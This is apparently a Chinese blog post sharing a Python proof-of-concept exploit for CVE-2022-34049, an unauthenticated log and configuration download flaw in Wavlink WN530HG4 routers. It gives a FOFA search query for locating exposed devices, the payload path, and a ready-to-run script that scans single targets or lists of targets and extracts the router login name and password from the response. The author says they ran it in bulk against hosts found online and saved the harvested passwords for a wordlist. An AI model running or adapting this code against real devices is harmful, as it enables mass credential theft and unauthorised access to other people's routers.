学python得永生,python大法好之利用python编写CVE-2022-34049 poc

漏洞说明

Wavlink WN530HG4 M30HG4.V5030.191116中存在访问控制问题,未经验证的攻击者可以下载日志文件和配置数据。

影响版本

Wavlink WN530HG4 M30HG4.V5030.191116
漏洞复现
fofa:title="Wi-Fi APP Login"
payload:/cgi-bin/ExportLogs.sh
学python得永生,python大法好之利用python编写CVE-2022-34049 poc

POC

#!/usr/bin/env python
# -*- conding:utf-8 -*-

import requests
import argparse
import sys
import re
import urllib3
urllib3.disable_warnings()


def title():
    print("""
  _____ __      __ ______          ___    ___   ___   ___           ____   _  _     ___   _  _     ___  
 / ____|\ \    / /|  ____|        |__ \  / _ \ |__ \ |__ \         |___ \ | || |   / _ \ | || |   / _ \ 
| |      \ \  / / | |__    ______    ) || | | |   ) |   ) | ______   __) || || |_ | | | || || |_ | (_) |
| |       \ \/ /  |  __|  |______|  / / | | | |  / /   / / |______| |__ < |__   _|| | | ||__   _| \__, |
| |____    \  /   | |____          / /_ | |_| | / /_  / /_          ___) |   | |  | |_| |   | |     / / 
 \_____|    \/    |______|        |____| \___/ |____||____|        |____/    |_|   \___/    |_|    /_/  
                                                                                                        
                                                               Author:Henry4E36
               """)

class information(object):
    def __init__(self,args):
        self.args = args
        self.url = args.url
        self.file = args.file

    def target_url(self):
        target_url = self.url + "/cgi-bin/ExportLogs.sh"
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0",

        }
        try:
            res = requests.get(url=target_url, headers=headers, verify=False, timeout=5)
            if res.status_code == 200 and "Login" in res.text and "Password" in res.text:
                print(f"\033[31m[{chr(8730)}] 目标系统: {self.url} 存在Wavlink 导出日志配置未授权访问下载漏洞\033[0m")
                pattern1 = re.compile(r"Login=(.*)")
                pattern2 = re.compile(r"Password=(.*)")
                username = pattern1.findall(res.text)[0]
                password = pattern2.findall(res.text)[0]
                print(f"\033[31m[{chr(8730)}] 用户名: {username}  密码:{password}\033[0m")
                print("[" + "-"*100 + "]")
            else:
                print(f"[\033[31mx\033[0m]  目标系统: {self.url} 不存在Wavlink 导出日志配置未授权访问下载漏洞")
                print("[" + "-"*100 + "]")
        except Exception as e:
            print("[\033[31mX\033[0m]  连接错误!")
            print("[" + "-"*100 + "]")

    def file_url(self):
        with open(self.file, "r") as urls:
            for url in urls:
                url = url.strip()
                if url[:4] != "http":
                    url = "http://" + url
                self.url = url.strip()
                information.target_url(self)


if __name__ == "__main__":
    title()
    parser = ar=argparse.ArgumentParser(description=' Wavlink 导出日志配置未授权访问下载')
    parser.add_argument("-u", "--url", type=str, metavar="url", help="Target url eg:\"http://127.0.0.1\"")
    parser.add_argument("-f", "--file", metavar="file", help="Targets in file  eg:\"ip.txt\"")
    args = parser.parse_args()
    if len(sys.argv) != 3:
        print(
            "[-]  参数错误!\neg1:>>>python3 CVE-2022-34049.py -u http://127.0.0.1\neg2:>>>python3 CVE-2022-34049.py -f ip.txt")
    elif args.url:
        information(args).target_url()

    elif args.file:
        information(args).file_url()

利用fofa搜集的数据,批量跑了一下数据,把password字段收集下来,可以补充到字典里去。


评论区

评论一下~


14+29=?

暂无评论,要不来一发?

回到顶部